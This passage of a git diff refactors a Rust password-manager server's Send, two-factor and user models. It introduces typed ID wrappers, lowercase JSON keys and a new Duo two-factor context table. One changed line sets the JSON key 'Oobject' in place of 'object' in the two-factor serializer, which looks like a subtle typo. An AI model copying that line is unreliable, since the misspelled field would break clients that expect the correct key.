|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"Type": self.atype,
|
"type": self.atype,
|
||||||
|
|
||||||
"Name": self.name,
|
"name": self.name,
|
||||||
"Text": if self.atype == SendType::Text as i32 { Some(&data) } else { None },
|
"text": if self.atype == SendType::Text as i32 { Some(&data) } else { None },
|
||||||
"File": if self.atype == SendType::File as i32 { Some(&data) } else { None },
|
"file": if self.atype == SendType::File as i32 { Some(&data) } else { None },
|
||||||
|
|
||||||
"ExpirationDate": self.expiration_date.as_ref().map(format_date),
|
"expirationDate": self.expiration_date.as_ref().map(format_date),
|
||||||
"CreatorIdentifier": self.creator_identifier(conn).await,
|
"creatorIdentifier": self.creator_identifier(conn).await,
|
||||||
"Object": "send-access",
|
"object": "send-access",
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -214,7 +226,8 @@ impl Send {
|
|||||||
self.update_users_revision(conn).await;
|
self.update_users_revision(conn).await;
|
||||||
|
|
||||||
if self.atype == SendType::File as i32 {
|
if self.atype == SendType::File as i32 {
|
||||||
std::fs::remove_dir_all(std::path::Path::new(&crate::CONFIG.sends_folder()).join(&self.uuid)).ok();
|
let operator = CONFIG.opendal_operator_for_path_type(PathType::Sends)?;
|
||||||
|
operator.remove_all(&self.uuid).await.ok();
|
||||||
}
|
}
|
||||||
|
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
@@ -231,7 +244,7 @@ impl Send {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn update_users_revision(&self, conn: &mut DbConn) -> Vec<String> {
|
pub async fn update_users_revision(&self, conn: &mut DbConn) -> Vec<UserId> {
|
||||||
let mut user_uuids = Vec::new();
|
let mut user_uuids = Vec::new();
|
||||||
match &self.user_uuid {
|
match &self.user_uuid {
|
||||||
Some(user_uuid) => {
|
Some(user_uuid) => {
|
||||||
@@ -245,7 +258,7 @@ impl Send {
|
|||||||
user_uuids
|
user_uuids
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
for send in Self::find_by_user(user_uuid, conn).await {
|
for send in Self::find_by_user(user_uuid, conn).await {
|
||||||
send.delete(conn).await?;
|
send.delete(conn).await?;
|
||||||
}
|
}
|
||||||
@@ -256,20 +269,19 @@ impl Send {
|
|||||||
use data_encoding::BASE64URL_NOPAD;
|
use data_encoding::BASE64URL_NOPAD;
|
||||||
use uuid::Uuid;
|
use uuid::Uuid;
|
||||||
|
|
||||||
let uuid_vec = match BASE64URL_NOPAD.decode(access_id.as_bytes()) {
|
let Ok(uuid_vec) = BASE64URL_NOPAD.decode(access_id.as_bytes()) else {
|
||||||
Ok(v) => v,
|
return None;
|
||||||
Err(_) => return None,
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let uuid = match Uuid::from_slice(&uuid_vec) {
|
let uuid = match Uuid::from_slice(&uuid_vec) {
|
||||||
Ok(u) => u.to_string(),
|
Ok(u) => SendId::from(u.to_string()),
|
||||||
Err(_) => return None,
|
Err(_) => return None,
|
||||||
};
|
};
|
||||||
|
|
||||||
Self::find_by_uuid(&uuid, conn).await
|
Self::find_by_uuid(&uuid, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid(uuid: &SendId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
sends::table
|
sends::table
|
||||||
.filter(sends::uuid.eq(uuid))
|
.filter(sends::uuid.eq(uuid))
|
||||||
@@ -279,7 +291,18 @@ impl Send {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_uuid_and_user(uuid: &SendId, user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
|
||||||
|
db_run! {conn: {
|
||||||
|
sends::table
|
||||||
|
.filter(sends::uuid.eq(uuid))
|
||||||
|
.filter(sends::user_uuid.eq(user_uuid))
|
||||||
|
.first::<SendDb>(conn)
|
||||||
|
.ok()
|
||||||
|
.from_db()
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
sends::table
|
sends::table
|
||||||
.filter(sends::user_uuid.eq(user_uuid))
|
.filter(sends::user_uuid.eq(user_uuid))
|
||||||
@@ -287,28 +310,21 @@ impl Send {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn size_by_user(user_uuid: &str, conn: &mut DbConn) -> Option<i64> {
|
pub async fn size_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Option<i64> {
|
||||||
let sends = Self::find_by_user(user_uuid, conn).await;
|
let sends = Self::find_by_user(user_uuid, conn).await;
|
||||||
|
|
||||||
#[allow(non_snake_case)]
|
#[derive(serde::Deserialize)]
|
||||||
#[derive(serde::Deserialize, Default)]
|
|
||||||
struct FileData {
|
struct FileData {
|
||||||
Size: Option<NumberOrString>,
|
#[serde(rename = "size", alias = "Size")]
|
||||||
size: Option<NumberOrString>,
|
size: NumberOrString,
|
||||||
}
|
}
|
||||||
|
|
||||||
let mut total: i64 = 0;
|
let mut total: i64 = 0;
|
||||||
for send in sends {
|
for send in sends {
|
||||||
if send.atype == SendType::File as i32 {
|
if send.atype == SendType::File as i32 {
|
||||||
let data: FileData = serde_json::from_str(&send.data).unwrap_or_default();
|
if let Ok(size) =
|
||||||
|
serde_json::from_str::<FileData>(&send.data).map_err(Into::into).and_then(|d| d.size.into_i64())
|
||||||
let size = match (data.size, data.Size) {
|
{
|
||||||
(Some(s), _) => s.into_i64(),
|
|
||||||
(_, Some(s)) => s.into_i64(),
|
|
||||||
(None, None) => continue,
|
|
||||||
};
|
|
||||||
|
|
||||||
if let Ok(size) = size {
|
|
||||||
total = total.checked_add(size)?;
|
total = total.checked_add(size)?;
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
@@ -317,7 +333,7 @@ impl Send {
|
|||||||
Some(total)
|
Some(total)
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_org(org_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
sends::table
|
sends::table
|
||||||
.filter(sends::organization_uuid.eq(org_uuid))
|
.filter(sends::organization_uuid.eq(org_uuid))
|
||||||
@@ -334,3 +350,48 @@ impl Send {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// separate namespace to avoid name collision with std::marker::Send
|
||||||
|
pub mod id {
|
||||||
|
use derive_more::{AsRef, Deref, Display, From};
|
||||||
|
use macros::{IdFromParam, UuidFromParam};
|
||||||
|
use std::marker::Send;
|
||||||
|
use std::path::Path;
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
DieselNewType,
|
||||||
|
Display,
|
||||||
|
From,
|
||||||
|
FromForm,
|
||||||
|
Hash,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
UuidFromParam,
|
||||||
|
)]
|
||||||
|
pub struct SendId(String);
|
||||||
|
|
||||||
|
impl AsRef<Path> for SendId {
|
||||||
|
#[inline]
|
||||||
|
fn as_ref(&self) -> &Path {
|
||||||
|
Path::new(&self.0)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone, Debug, AsRef, Deref, Display, From, FromForm, Hash, PartialEq, Eq, Serialize, Deserialize, IdFromParam,
|
||||||
|
)]
|
||||||
|
pub struct SendFileId(String);
|
||||||
|
|
||||||
|
impl AsRef<Path> for SendFileId {
|
||||||
|
#[inline]
|
||||||
|
fn as_ref(&self) -> &Path {
|
||||||
|
Path::new(&self.0)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
@@ -1,5 +1,6 @@
|
|||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
|
use super::UserId;
|
||||||
use crate::{api::EmptyResult, db::DbConn, error::MapResult};
|
use crate::{api::EmptyResult, db::DbConn, error::MapResult};
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
@@ -7,12 +8,12 @@ db_object! {
|
|||||||
#[diesel(table_name = twofactor)]
|
#[diesel(table_name = twofactor)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct TwoFactor {
|
pub struct TwoFactor {
|
||||||
pub uuid: String,
|
pub uuid: TwoFactorId,
|
||||||
pub user_uuid: String,
|
pub user_uuid: UserId,
|
||||||
pub atype: i32,
|
pub atype: i32,
|
||||||
pub enabled: bool,
|
pub enabled: bool,
|
||||||
pub data: String,
|
pub data: String,
|
||||||
pub last_used: i32,
|
pub last_used: i64,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -41,9 +42,9 @@ pub enum TwoFactorType {
|
|||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
impl TwoFactor {
|
impl TwoFactor {
|
||||||
pub fn new(user_uuid: String, atype: TwoFactorType, data: String) -> Self {
|
pub fn new(user_uuid: UserId, atype: TwoFactorType, data: String) -> Self {
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: TwoFactorId(crate::util::get_uuid()),
|
||||||
user_uuid,
|
user_uuid,
|
||||||
atype: atype as i32,
|
atype: atype as i32,
|
||||||
enabled: true,
|
enabled: true,
|
||||||
@@ -54,17 +55,17 @@ impl TwoFactor {
|
|||||||
|
|
||||||
pub fn to_json(&self) -> Value {
|
pub fn to_json(&self) -> Value {
|
||||||
json!({
|
json!({
|
||||||
"Enabled": self.enabled,
|
"enabled": self.enabled,
|
||||||
"Key": "", // This key and value vary
|
"key": "", // This key and value vary
|
||||||
"Object": "twoFactorAuthenticator" // This value varies
|
"Oobject": "twoFactorAuthenticator" // This value varies
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn to_json_provider(&self) -> Value {
|
pub fn to_json_provider(&self) -> Value {
|
||||||
json!({
|
json!({
|
||||||
"Enabled": self.enabled,
|
"enabled": self.enabled,
|
||||||
"Type": self.atype,
|
"type": self.atype,
|
||||||
"Object": "twoFactorProvider"
|
"object": "twoFactorProvider"
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -95,7 +96,7 @@ impl TwoFactor {
|
|||||||
// We need to make sure we're not going to violate the unique constraint on user_uuid and atype.
|
// We need to make sure we're not going to violate the unique constraint on user_uuid and atype.
|
||||||
// This happens automatically on other DBMS backends due to replace_into(). PostgreSQL does
|
// This happens automatically on other DBMS backends due to replace_into(). PostgreSQL does
|
||||||
// not support multiple constraints on ON CONFLICT clauses.
|
// not support multiple constraints on ON CONFLICT clauses.
|
||||||
diesel::delete(twofactor::table.filter(twofactor::user_uuid.eq(&self.user_uuid)).filter(twofactor::atype.eq(&self.atype)))
|
let _: () = diesel::delete(twofactor::table.filter(twofactor::user_uuid.eq(&self.user_uuid)).filter(twofactor::atype.eq(&self.atype)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error deleting twofactor for insert")?;
|
.map_res("Error deleting twofactor for insert")?;
|
||||||
|
|
||||||
@@ -118,7 +119,7 @@ impl TwoFactor {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
twofactor::table
|
twofactor::table
|
||||||
.filter(twofactor::user_uuid.eq(user_uuid))
|
.filter(twofactor::user_uuid.eq(user_uuid))
|
||||||
@@ -129,7 +130,7 @@ impl TwoFactor {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user_and_type(user_uuid: &str, atype: i32, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_user_and_type(user_uuid: &UserId, atype: i32, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
twofactor::table
|
twofactor::table
|
||||||
.filter(twofactor::user_uuid.eq(user_uuid))
|
.filter(twofactor::user_uuid.eq(user_uuid))
|
||||||
@@ -140,7 +141,7 @@ impl TwoFactor {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(twofactor::table.filter(twofactor::user_uuid.eq(user_uuid)))
|
diesel::delete(twofactor::table.filter(twofactor::user_uuid.eq(user_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -217,3 +218,6 @@ impl TwoFactor {
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(Clone, Debug, DieselNewType, FromForm, PartialEq, Eq, Hash, Serialize, Deserialize)]
|
||||||
|
pub struct TwoFactorId(String);
|
||||||
|
|||||||
84
src/db/models/two_factor_duo_context.rs
Normal file
84
src/db/models/two_factor_duo_context.rs
Normal file
@@ -0,0 +1,84 @@
|
|||||||
|
use chrono::Utc;
|
||||||
|
|
||||||
|
use crate::{api::EmptyResult, db::DbConn, error::MapResult};
|
||||||
|
|
||||||
|
db_object! {
|
||||||
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
|
#[diesel(table_name = twofactor_duo_ctx)]
|
||||||
|
#[diesel(primary_key(state))]
|
||||||
|
pub struct TwoFactorDuoContext {
|
||||||
|
pub state: String,
|
||||||
|
pub user_email: String,
|
||||||
|
pub nonce: String,
|
||||||
|
pub exp: i64,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
impl TwoFactorDuoContext {
|
||||||
|
pub async fn find_by_state(state: &str, conn: &mut DbConn) -> Option<Self> {
|
||||||
|
db_run! {
|
||||||
|
conn: {
|
||||||
|
twofactor_duo_ctx::table
|
||||||
|
.filter(twofactor_duo_ctx::state.eq(state))
|
||||||
|
.first::<TwoFactorDuoContextDb>(conn)
|
||||||
|
.ok()
|
||||||
|
.from_db()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn save(state: &str, user_email: &str, nonce: &str, ttl: i64, conn: &mut DbConn) -> EmptyResult {
|
||||||
|
// A saved context should never be changed, only created or deleted.
|
||||||
|
let exists = Self::find_by_state(state, conn).await;
|
||||||
|
if exists.is_some() {
|
||||||
|
return Ok(());
|
||||||
|
};
|
||||||
|
|
||||||
|
let exp = Utc::now().timestamp() + ttl;
|
||||||
|
|
||||||
|
db_run! {
|
||||||
|
conn: {
|
||||||
|
diesel::insert_into(twofactor_duo_ctx::table)
|
||||||
|
.values((
|
||||||
|
twofactor_duo_ctx::state.eq(state),
|
||||||
|
twofactor_duo_ctx::user_email.eq(user_email),
|
||||||
|
twofactor_duo_ctx::nonce.eq(nonce),
|
||||||
|
twofactor_duo_ctx::exp.eq(exp)
|
||||||
|
))
|
||||||
|
.execute(conn)
|
||||||
|
.map_res("Error saving context to twofactor_duo_ctx")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn find_expired(conn: &mut DbConn) -> Vec<Self> {
|
||||||
|
let now = Utc::now().timestamp();
|
||||||
|
db_run! {
|
||||||
|
conn: {
|
||||||
|
twofactor_duo_ctx::table
|
||||||
|
.filter(twofactor_duo_ctx::exp.lt(now))
|
||||||
|
.load::<TwoFactorDuoContextDb>(conn)
|
||||||
|
.expect("Error finding expired contexts in twofactor_duo_ctx")
|
||||||
|
.from_db()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn delete(&self, conn: &mut DbConn) -> EmptyResult {
|
||||||
|
db_run! {
|
||||||
|
conn: {
|
||||||
|
diesel::delete(
|
||||||
|
twofactor_duo_ctx::table
|
||||||
|
.filter(twofactor_duo_ctx::state.eq(&self.state)))
|
||||||
|
.execute(conn)
|
||||||
|
.map_res("Error deleting from twofactor_duo_ctx")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn purge_expired_duo_contexts(conn: &mut DbConn) {
|
||||||
|
for context in Self::find_expired(conn).await {
|
||||||
|
context.delete(conn).await.ok();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -1,18 +1,28 @@
|
|||||||
use chrono::{NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, Utc};
|
||||||
|
|
||||||
use crate::{api::EmptyResult, auth::ClientIp, db::DbConn, error::MapResult, CONFIG};
|
use crate::{
|
||||||
|
api::EmptyResult,
|
||||||
|
auth::ClientIp,
|
||||||
|
db::{
|
||||||
|
models::{DeviceId, UserId},
|
||||||
|
DbConn,
|
||||||
|
},
|
||||||
|
error::MapResult,
|
||||||
|
CONFIG,
|
||||||
|
};
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
#[diesel(table_name = twofactor_incomplete)]
|
#[diesel(table_name = twofactor_incomplete)]
|
||||||
#[diesel(primary_key(user_uuid, device_uuid))]
|
#[diesel(primary_key(user_uuid, device_uuid))]
|
||||||
pub struct TwoFactorIncomplete {
|
pub struct TwoFactorIncomplete {
|
||||||
pub user_uuid: String,
|
pub user_uuid: UserId,
|
||||||
// This device UUID is simply what's claimed by the device. It doesn't
|
// This device UUID is simply what's claimed by the device. It doesn't
|
||||||
// necessarily correspond to any UUID in the devices table, since a device
|
// necessarily correspond to any UUID in the devices table, since a device
|
||||||
// must complete 2FA login before being added into the devices table.
|
// must complete 2FA login before being added into the devices table.
|
||||||
pub device_uuid: String,
|
pub device_uuid: DeviceId,
|
||||||
pub device_name: String,
|
pub device_name: String,
|
||||||
|
pub device_type: i32,
|
||||||
pub login_time: NaiveDateTime,
|
pub login_time: NaiveDateTime,
|
||||||
pub ip_address: String,
|
pub ip_address: String,
|
||||||
}
|
}
|
||||||
@@ -20,9 +30,10 @@ db_object! {
|
|||||||
|
|
||||||
impl TwoFactorIncomplete {
|
impl TwoFactorIncomplete {
|
||||||
pub async fn mark_incomplete(
|
pub async fn mark_incomplete(
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
device_uuid: &str,
|
device_uuid: &DeviceId,
|
||||||
device_name: &str,
|
device_name: &str,
|
||||||
|
device_type: i32,
|
||||||
ip: &ClientIp,
|
ip: &ClientIp,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
@@ -44,6 +55,7 @@ impl TwoFactorIncomplete {
|
|||||||
twofactor_incomplete::user_uuid.eq(user_uuid),
|
twofactor_incomplete::user_uuid.eq(user_uuid),
|
||||||
twofactor_incomplete::device_uuid.eq(device_uuid),
|
twofactor_incomplete::device_uuid.eq(device_uuid),
|
||||||
twofactor_incomplete::device_name.eq(device_name),
|
twofactor_incomplete::device_name.eq(device_name),
|
||||||
|
twofactor_incomplete::device_type.eq(device_type),
|
||||||
twofactor_incomplete::login_time.eq(Utc::now().naive_utc()),
|
twofactor_incomplete::login_time.eq(Utc::now().naive_utc()),
|
||||||
twofactor_incomplete::ip_address.eq(ip.ip.to_string()),
|
twofactor_incomplete::ip_address.eq(ip.ip.to_string()),
|
||||||
))
|
))
|
||||||
@@ -52,7 +64,7 @@ impl TwoFactorIncomplete {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn mark_complete(user_uuid: &str, device_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn mark_complete(user_uuid: &UserId, device_uuid: &DeviceId, conn: &mut DbConn) -> EmptyResult {
|
||||||
if CONFIG.incomplete_2fa_time_limit() <= 0 || !CONFIG.mail_enabled() {
|
if CONFIG.incomplete_2fa_time_limit() <= 0 || !CONFIG.mail_enabled() {
|
||||||
return Ok(());
|
return Ok(());
|
||||||
}
|
}
|
||||||
@@ -60,7 +72,11 @@ impl TwoFactorIncomplete {
|
|||||||
Self::delete_by_user_and_device(user_uuid, device_uuid, conn).await
|
Self::delete_by_user_and_device(user_uuid, device_uuid, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user_and_device(user_uuid: &str, device_uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_user_and_device(
|
||||||
|
user_uuid: &UserId,
|
||||||
|
device_uuid: &DeviceId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
twofactor_incomplete::table
|
twofactor_incomplete::table
|
||||||
.filter(twofactor_incomplete::user_uuid.eq(user_uuid))
|
.filter(twofactor_incomplete::user_uuid.eq(user_uuid))
|
||||||
@@ -85,7 +101,11 @@ impl TwoFactorIncomplete {
|
|||||||
Self::delete_by_user_and_device(&self.user_uuid, &self.device_uuid, conn).await
|
Self::delete_by_user_and_device(&self.user_uuid, &self.device_uuid, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_by_user_and_device(user_uuid: &str, device_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_by_user_and_device(
|
||||||
|
user_uuid: &UserId,
|
||||||
|
device_uuid: &DeviceId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(twofactor_incomplete::table
|
diesel::delete(twofactor_incomplete::table
|
||||||
.filter(twofactor_incomplete::user_uuid.eq(user_uuid))
|
.filter(twofactor_incomplete::user_uuid.eq(user_uuid))
|
||||||
@@ -95,7 +115,7 @@ impl TwoFactorIncomplete {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(twofactor_incomplete::table.filter(twofactor_incomplete::user_uuid.eq(user_uuid)))
|
diesel::delete(twofactor_incomplete::table.filter(twofactor_incomplete::user_uuid.eq(user_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
|
|||||||
@@ -1,8 +1,19 @@
|
|||||||
use chrono::{Duration, NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, TimeDelta, Utc};
|
||||||
|
use derive_more::{AsRef, Deref, Display, From};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::crypto;
|
use super::{
|
||||||
use crate::CONFIG;
|
Cipher, Device, EmergencyAccess, Favorite, Folder, Membership, MembershipType, TwoFactor, TwoFactorIncomplete,
|
||||||
|
};
|
||||||
|
use crate::{
|
||||||
|
api::EmptyResult,
|
||||||
|
crypto,
|
||||||
|
db::DbConn,
|
||||||
|
error::MapResult,
|
||||||
|
util::{format_date, get_uuid, retry},
|
||||||
|
CONFIG,
|
||||||
|
};
|
||||||
|
use macros::UuidFromParam;
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
@@ -10,7 +21,7 @@ db_object! {
|
|||||||
#[diesel(treat_none_as_null = true)]
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct User {
|
pub struct User {
|
||||||
pub uuid: String,
|
pub uuid: UserId,
|
||||||
pub enabled: bool,
|
pub enabled: bool,
|
||||||
pub created_at: NaiveDateTime,
|
pub created_at: NaiveDateTime,
|
||||||
pub updated_at: NaiveDateTime,
|
pub updated_at: NaiveDateTime,
|
||||||
@@ -90,7 +101,7 @@ impl User {
|
|||||||
let email = email.to_lowercase();
|
let email = email.to_lowercase();
|
||||||
|
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: UserId(get_uuid()),
|
||||||
enabled: true,
|
enabled: true,
|
||||||
created_at: now,
|
created_at: now,
|
||||||
updated_at: now,
|
updated_at: now,
|
||||||
@@ -107,7 +118,7 @@ impl User {
|
|||||||
salt: crypto::get_random_bytes::<64>().to_vec(),
|
salt: crypto::get_random_bytes::<64>().to_vec(),
|
||||||
password_iterations: CONFIG.password_iterations(),
|
password_iterations: CONFIG.password_iterations(),
|
||||||
|
|
||||||
security_stamp: crate::util::get_uuid(),
|
security_stamp: get_uuid(),
|
||||||
stamp_exception: None,
|
stamp_exception: None,
|
||||||
|
|
||||||
password_hint: None,
|
password_hint: None,
|
||||||
@@ -144,14 +155,14 @@ impl User {
|
|||||||
|
|
||||||
pub fn check_valid_recovery_code(&self, recovery_code: &str) -> bool {
|
pub fn check_valid_recovery_code(&self, recovery_code: &str) -> bool {
|
||||||
if let Some(ref totp_recover) = self.totp_recover {
|
if let Some(ref totp_recover) = self.totp_recover {
|
||||||
crate::crypto::ct_eq(recovery_code, totp_recover.to_lowercase())
|
crypto::ct_eq(recovery_code, totp_recover.to_lowercase())
|
||||||
} else {
|
} else {
|
||||||
false
|
false
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn check_valid_api_key(&self, key: &str) -> bool {
|
pub fn check_valid_api_key(&self, key: &str) -> bool {
|
||||||
matches!(self.api_key, Some(ref api_key) if crate::crypto::ct_eq(api_key, key))
|
matches!(self.api_key, Some(ref api_key) if crypto::ct_eq(api_key, key))
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Set the password hash generated
|
/// Set the password hash generated
|
||||||
@@ -162,8 +173,8 @@ impl User {
|
|||||||
/// * `password` - A str which contains a hashed version of the users master password.
|
/// * `password` - A str which contains a hashed version of the users master password.
|
||||||
/// * `new_key` - A String which contains the new aKey value of the users master password.
|
/// * `new_key` - A String which contains the new aKey value of the users master password.
|
||||||
/// * `allow_next_route` - A Option<Vec<String>> with the function names of the next allowed (rocket) routes.
|
/// * `allow_next_route` - A Option<Vec<String>> with the function names of the next allowed (rocket) routes.
|
||||||
/// These routes are able to use the previous stamp id for the next 2 minutes.
|
/// These routes are able to use the previous stamp id for the next 2 minutes.
|
||||||
/// After these 2 minutes this stamp will expire.
|
/// After these 2 minutes this stamp will expire.
|
||||||
///
|
///
|
||||||
pub fn set_password(
|
pub fn set_password(
|
||||||
&mut self,
|
&mut self,
|
||||||
@@ -188,21 +199,21 @@ impl User {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub fn reset_security_stamp(&mut self) {
|
pub fn reset_security_stamp(&mut self) {
|
||||||
self.security_stamp = crate::util::get_uuid();
|
self.security_stamp = get_uuid();
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Set the stamp_exception to only allow a subsequent request matching a specific route using the current security-stamp.
|
/// Set the stamp_exception to only allow a subsequent request matching a specific route using the current security-stamp.
|
||||||
///
|
///
|
||||||
/// # Arguments
|
/// # Arguments
|
||||||
/// * `route_exception` - A Vec<String> with the function names of the next allowed (rocket) routes.
|
/// * `route_exception` - A Vec<String> with the function names of the next allowed (rocket) routes.
|
||||||
/// These routes are able to use the previous stamp id for the next 2 minutes.
|
/// These routes are able to use the previous stamp id for the next 2 minutes.
|
||||||
/// After these 2 minutes this stamp will expire.
|
/// After these 2 minutes this stamp will expire.
|
||||||
///
|
///
|
||||||
pub fn set_stamp_exception(&mut self, route_exception: Vec<String>) {
|
pub fn set_stamp_exception(&mut self, route_exception: Vec<String>) {
|
||||||
let stamp_exception = UserStampException {
|
let stamp_exception = UserStampException {
|
||||||
routes: route_exception,
|
routes: route_exception,
|
||||||
security_stamp: self.security_stamp.clone(),
|
security_stamp: self.security_stamp.clone(),
|
||||||
expire: (Utc::now().naive_utc() + Duration::minutes(2)).timestamp(),
|
expire: (Utc::now() + TimeDelta::try_minutes(2).unwrap()).timestamp(),
|
||||||
};
|
};
|
||||||
self.stamp_exception = Some(serde_json::to_string(&stamp_exception).unwrap_or_default());
|
self.stamp_exception = Some(serde_json::to_string(&stamp_exception).unwrap_or_default());
|
||||||
}
|
}
|
||||||
@@ -213,20 +224,11 @@ impl User {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
use super::{
|
|
||||||
Cipher, Device, EmergencyAccess, Favorite, Folder, Send, TwoFactor, TwoFactorIncomplete, UserOrgType,
|
|
||||||
UserOrganization,
|
|
||||||
};
|
|
||||||
use crate::db::DbConn;
|
|
||||||
|
|
||||||
use crate::api::EmptyResult;
|
